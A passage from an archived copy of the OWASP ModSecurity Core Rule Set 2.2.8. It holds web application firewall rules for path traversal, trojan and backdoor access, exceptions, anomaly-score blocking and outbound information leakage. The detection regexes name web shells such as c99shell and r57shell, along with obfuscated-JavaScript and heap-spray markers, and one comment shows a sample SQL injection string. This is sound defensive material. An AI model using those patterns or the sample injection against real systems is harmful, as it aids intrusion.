"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'7',t:none,ctl:auditLogParts=+E,block,msg:'Path Traversal Attack',id:'950103',severity:'2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,capture,tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL-%{matched_var_name}=%{matched_var}'" # Weaker signature #SecRule REQUEST_FILENAME "\.\.[/\x5c]" "phase:1,rev:'2.2.8',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Path Traversal Attack',id:'950103',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/DIR_TRAVERSAL-%{matched_var_name}=%{matched_var}'" SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_45_trojans.conf000066400000000000000000000071141216457256400310100ustar00rootroot00000000000000# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # The trojan access detection rules detects access to known Trojans already # installed on a server. Uploading of Trojans is part of the Anti-Virus rules # and uses external Anti Virus program when uploading files. # # Detection of Trojans access is especially important in a hosting environment # where the actual Trojan upload may be done through valid methods and not # through hacking. # -- # # NOTE Trojans detection is based on checking elements controlled by the client. # A determined attacked can bypass those checks. We are working on # enchaining the checks so it would require a major change in the Trojan # to overcome. # # NOTE We found out that Trojan horses are not detected easily by Anti-Virus # software when uploading as the signature set of AV software is not tuned # for this purpose. We are working on adding signature tuned to detect # Trojans upload to file uploading inspection. # SecRule REQUEST_HEADERS_NAMES "x_(?:key|file)\b" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'950110',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" SecRule REQUEST_FILENAME "root\.exe" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'950921',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" SecRule RESPONSE_BODY "(?:[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma web shell)\b|imhabirligi phpftp)|(?:r(?:emote explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?: commander|-terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft windows\b.{0,10}?\bversion\b.{0,20}?\(c\) copyright 1985-.{0,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r inc)\.|(?:www\.sanalteror\.org - indexer and read|haxplor)er|php(?:konsole| shell)|c99shell)\b|aventgrup\.<br>|drwxr))" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',t:none,ctl:auditLogParts=+E,block,msg:'Backdoor access',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'950922',tag:'OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN',tag:'WASCTC/WASC-01',tag:'OWASP_TOP_10/A7',tag:'PCI/5.1.1',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_47_common_exceptions.conf�������0000664�0000000�0000000�00000004307�12164572564�0033064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file is used as an exception mechanism to remove common false positives # that may be encountered. # # Exception for Apache SSL pinger # SecRule REQUEST_LINE "^GET /$" "chain,phase:2,id:'981020',t:none,pass,nolog" SecRule REMOTE_ADDR "^(127\.0\.0\.|\:\:)1$" "chain,t:none" SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}" SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1}" # # Exception for Apache internal dummy connection # SecRule REQUEST_LINE "^(GET /|OPTIONS \*) HTTP/1.0$" "chain,phase:2,id:'981021',t:none,pass,nolog" SecRule REMOTE_ADDR "^(127\.0\.0\.|\:\:)1$" "chain,t:none" SecRule REQUEST_HEADERS:User-Agent "^.*\(internal dummy connection\)$" "t:none,t:none,chain" SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}" SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1}" # # Exception for Adobe Flash Player # https://www.modsecurity.org/tracker/browse/CORERULES-57 # SecRule REQUEST_METHOD "@streq POST" "chain,phase:2,id:'981022',t:none,pass,nolog" SecRule REQUEST_HEADERS:User-Agent "@contains Adobe Flash Player" "chain,t:none" SecRule REQUEST_HEADERS:X-Flash-Version ".*" "chain,t:none" SecRule REQUEST_HEADERS:Content-Type "@contains application/x-amf" "chain,t:none" SecRule TX:'/PROTOCOL_VIOLATION\\\/MISSING_HEADER/' ".*" "chain,setvar:tx.missing_header=+1,setvar:tx.missing_header_%{tx.missing_header}=%{matched_var_name}" SecRule TX:'/MISSING_HEADER_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-5" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_48_local_exceptions.conf.example0000664�0000000�0000000�00000005343�12164572564�0034322�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.7 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file is used to allow custom checks and exclusions for the transactional # variable rules. Place rules in this file so that you may influence what happens # in the 49 - Enforcement File. # In previous ModSecurity rules, the TARGET list would have to be updated in # order to exclude a specific paramater like this - # # SecRule ARGS_NAMES|ARGS|!ARGS:foo # # With the new transactional variable rules, parameter exceptions can now # be handled AFTER the initial inspection as the rules now use setvars to # capture meta-data with each rule match. They use this syntax - # # setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var} # # When the transactional rules trigger, they will set a TX variable similar to this # for an SQL Injection attack - # # Set variable "tx.950001-WEB_ATTACK/SQL_INJECTION-ARGS:comments" to "1' or select * from users where username = admin ". # # With this data now available, the user can implement flexible exceptions. # # Exception example - exclude a parameter # # In this example, we are inspecting # the TX collections to see if there is a current variable that has matched # for the 950001 SQL Injection rule ID and for the "comments" parameter. If # so, then we are going to remove the collection entirely by using the # setvar:!tx. syntax. By doing this, the TX collection is removed before final # inspection at the end of phase 2 in the enforcement file. # #SecRule TX:'/^950001.*ARGS:comments/' ".*" "chain,phase:2,t:none,nolog,pass" # SecRule MATCHED_VAR_NAME "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20" # # This is an example exclusion for the entire SQL Injection category of rules # #SecRule TX:'/SQL_INJECTION/' ".*" "phase:2,t:none,nolog,pass,chain,setvar:tx.sql_injection=+1,setvar:tx.sql_injection_%{tx.sql_injection}=%{matched_var_name}" # SecRule TX:'/^SQL_INJECTION_/' "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20" # # This is an example exclusion that combines the URL and parameter and removes # a specific SQL Injection ID only if the parameter foo payload matches # #SecRule REQUEST_FILENAME "@streq /path/to/file.php" "chain,phase:2,t:none,nolog,pass" # SecRule TX:'/^950001.*ARGS:foo/' "@streq Item 1=1" "chain,t:none" # SecRule MATCHED_VAR_NAME "TX\:(.*)" "capture,t:none,setvar:!tx.%{tx.1},setvar:tx.anomaly_score=-20" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_49_inbound_blocking.conf��������0000664�0000000�0000000�00000003456�12164572564�0032647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # Uncomment the anomaly sections you wish to use. # These rules use the anomaly score settings specified in the 10 config file. # You should also set the desired disruptive action (deny, redirect, etc...). # # Alert and Block based on Anomaly Score and OSVDB Check # SecRule TX:ANOMALY_SCORE "@gt 0" \ "chain,phase:2,id:'981175',t:none,deny,log,msg:'Inbound Attack Targeting OSVDB Flagged Resource.',setvar:tx.inbound_tx_msg=%{tx.msg},setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}" SecRule RESOURCE:OSVDB_VULNERABLE "@eq 1" chain SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" # Alert and Block based on Anomaly Scores # SecRule TX:ANOMALY_SCORE "@gt 0" \ "chain,phase:2,id:'981176',t:none,deny,log,msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE}, SQLi=%{TX.SQL_INJECTION_SCORE}, XSS=%{TX.XSS_SCORE}): Last Matched Message: %{tx.msg}',logdata:'Last Matched Data: %{matched_var}',setvar:tx.inbound_tx_msg=%{tx.msg},setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}" SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_level}" chain SecRule TX:ANOMALY_SCORE_BLOCKING "@streq on" chain SecRule TX:/^\d+\-/ "(.*)" # Alert and Block on a specific attack category such as SQL Injection # #SecRule TX:SQL_INJECTION_SCORE "@gt 0" \ # "phase:2,t:none,log,block,msg:'SQL Injection Detected (score %{TX.SQL_INJECTION_SCORE}): %{tx.msg}'" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_50_outbound.conf����������������0000664�0000000�0000000�00000053500�12164572564�0031163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # NOTE By default the status code sent is 501, which implies that the web # server does not support the required operation. This is a non standard # of this status code which normally refers to unsupported HTTP methods. # It is used in order to confuse automated clients and scanners. # Zope Information Leakage SecRule RESPONSE_BODY "<h2>Site Error<\/h2>.{0,20}<p>An error was encountered while publishing this resource\." \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Zope Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970007',tag:'OWASP_CRS/LEAKAGE/ERRORS_ZOPE',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # CF Information Leakage SecRule RESPONSE_BODY "\bThe error occurred in\b.{0,100}: line\b.{0,1000}\bColdFusion\b.*?\bStack Trace \(click to expand\)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Cold Fusion Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970008',tag:'OWASP_CRS/LEAKAGE/ERRORS_CF',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # PHP Information Leakage SecRule RESPONSE_BODY "<b>Warning<\/b>.{0,100}?:.{0,1000}?\bon line\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'PHP Information Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970009',tag:'OWASP_CRS/LEAKAGE/ERRORS_PHP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # ISA server existence revealed SecRule RESPONSE_BODY "\b403 Forbidden\b.*?\bInternet Security and Acceleration Server\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'ISA server existence revealed',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970010',tag:'MISCONFIGURATION',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-MISCONFIGURATION-%{matched_var_name}=%{tx.0}" # Microsoft Office document properties leakage SecRule RESPONSE_BODY "<o:documentproperties>" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,block,msg:'Microsoft Office document properties leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970012',tag:'OWASP_CRS/LEAKAGE/INFO_STATISTICS',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "\<\%" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'ASP/JSP source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970903',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_ASP_JSP',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule RESPONSE_BODY "!(?:\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b)" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # CF source code leakage SecRule RESPONSE_BODY "<cf" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Cold Fusion source code leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970016',tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_CF',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/SOURCE_CODE-%{matched_var_name}=%{tx.0}" # IIS default location SecRule RESPONSE_BODY "[a-z]:\\\\inetpub\b" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,t:lowercase,ctl:auditLogParts=+E,block,msg:'IIS installed in default location',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970018',severity:'3',chain" SecRule &GLOBAL:alerted_970018_iisDefLoc "@eq 0" "setvar:global.alerted_970018_iisDefLoc,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score}" # The application is not available SecRule RESPONSE_STATUS "^5\d{2}$" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'The application is not available',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970901',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-AVAILABILITY/APP_NOT_AVAIL-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?:Microsoft OLE DB Provider for SQL Server(?:<\/font>.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)<br>Timeout expired<br>)|<h1>internal server error<\/h1>.*?<h2>part of the server has crashed or it has a configuration error\.<\/h2>|cannot connect to the server: timed out)" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'The application is not available',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970118',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-AVAILABILITY/APP_NOT_AVAIL-%{matched_var_name}=%{tx.0}" # Weblogic information disclosure SecRule RESPONSE_STATUS "^500$" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,t:none,capture,ctl:auditLogParts=+E,block,msg:'WebLogic information disclosure',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970021',severity:'3'" SecRule RESPONSE_BODY "<title>JSP compile error<\/title>" "t:none,capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}" # File or Directory Names Leakage SecRule RESPONSE_BODY "href\s?=[\s\"\']*[A-Za-z]\:\x5c([^\"\']+)" "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',chain,capture,t:none,capture,ctl:auditLogParts=+E,block,msg:'File or Directory Names Leakage',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'970011',tag:'OWASP_CRS/LEAKAGE/INFO_FILE',tag:'WASCTC/WASC-13',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.6',severity:'3'" SecRule TX:1 "!program files\x5cmicrosoft office\x5c(?:office|templates)" "t:none,capture,t:lowercase,setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/INFO-%{matched_var_name}=%{tx.0}" # # IFrame Injection # SecRule RESPONSE_BODY "!@pm iframe" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'6',id:'981177',t:none,capture,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,pass,nolog,skipAfter:END_IFRAME_CHECK" SecRule RESPONSE_BODY "<\W*iframe[^>]+?\b(?:width|height)\b\W*?=\W*?[\"']?[^\"'1-9]*?(?:(?:20|1?\d(?:\.\d*)?)(?![\d%.])|[0-3](?:\.\d*)?%)" \ "t:replaceComments,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Possibly malicious iframe tag in output',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981000',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "<\W*iframe[^>]+?\bstyle\W*?=\W*?[\"']?\W*?\bdisplay\b\W*?:\W*?\bnone\b" \ "t:replaceComments,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',ctl:auditLogParts=+E,block,msg:'Possibly malicious iframe tag in output',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981001',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i:<\s*IFRAME\s*?[^>]*?src=\"javascript:)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Malicious iframe+javascript tag in output',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',capture,id:'981003',tag:'OWASP_CRS/OWASP_CRS/MALICIOUS_IFRAME',tag:'bugtraq,13544',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_IFRAME-%{matched_var_name}=%{tx.0}" SecMarker END_IFRAME_CHECK # # Generic Malicious JS Detection # SecRule RESPONSE_BODY "(?i)(String\.fromCharCode\(.*?){4,}" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Excessive fromCharCode',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981004',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i)(eval\(.{0,15}unescape\()" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Eval+Unescape',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981005',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i)(var[^=]+=\s*unescape\s*;)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Unescape',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981006',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" SecRule RESPONSE_BODY "(?i:%u0c0c%u0c0c|%u9090%u9090|%u4141%u4141)" \ "t:none,phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',ctl:auditLogParts=+E,block,msg:'Potential Obfuscated Javascript in Output - Heap Spray',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'981007',tag:'OWASP_CRS/MALICIOUS_CODE',tag:'bugtraq,13544',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/MALICIOUS_CODE-%{matched_var_name}=%{tx.0}" # # Run PM check against response body data before running any RegEx Checks # If nothing matches, then we skip the remainder of phase:4 # SecRule RESPONSE_BODY "!@pmFromFile modsecurity_50_outbound.data" \ "phase:4,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',pass,id:'981178',t:none,capture,t:urlDecodeUni,t:htmlEntityDecode,nolog,skipAfter:END_OUTBOUND_CHECK" # ASP/JSP source code leakage SecRule RESPONSE_BODY 